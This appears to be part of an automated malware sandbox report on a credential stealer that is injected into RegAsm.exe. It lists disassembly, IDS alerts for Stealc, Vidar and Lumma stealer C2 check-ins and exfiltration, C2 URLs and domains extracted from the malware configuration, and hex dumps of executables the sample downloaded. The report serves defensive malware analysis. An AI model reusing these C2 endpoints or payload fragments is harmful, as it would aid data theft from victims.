Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [ebp+04h]	10_2_004407E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	10_2_0044A7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp+24h], DEC6D8DEh	10_2_00430810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3BABA5E0h	10_2_00444960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00427900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	10_2_0044A920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	10_2_0040DA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edi	10_2_0042FAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	10_2_00404B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_00444B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	10_2_00413B7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	10_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	10_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp di, 005Ch	10_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+68h]	10_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_0043BBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_00448C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	10_2_00405C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_00422C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	10_2_00441D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	10_2_0041DD55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00414D8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0040DE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, eax	10_2_00431ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, word ptr [esi]	10_2_00429EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_00428FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00428FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000005A8h]	10_2_00420F8A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49721 -> 5.42.101.62:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.42.101.62:80 -> 192.168.2.6:49721
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.42.101.62:80 -> 192.168.2.6:49721
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:49728 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.6:49727
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.6:49727
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.42.101.62:80 -> 192.168.2.6:49736
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.42.101.62:80 -> 192.168.2.6:49736
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.42.101.62:80 -> 192.168.2.6:49742
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.42.101.62:80 -> 192.168.2.6:49742
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49724 -> 104.21.1.169:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49724 -> 104.21.1.169:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49740 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49740 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49735 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49735 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49737 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49737 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49738 -> 104.21.1.169:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49738 -> 104.21.1.169:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor	URLs: delaylacedmn.site
Source: Malware configuration extractor	URLs: possiwreeste.site
Source: Malware configuration extractor	URLs: writekdmsnu.site
Source: Malware configuration extractor	URLs: agentyanlark.site
Source: Malware configuration extractor	URLs: underlinemdsj.site
Source: Malware configuration extractor	URLs: commandejorsk.site
Source: Malware configuration extractor	URLs: famikyjdiag.site
Source: Malware configuration extractor	URLs: bellykmrebk.site
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869
Source: Malware configuration extractor	URLs: https://t.me/jamsemlg

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:22 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:26 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:27 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:28 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:28 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 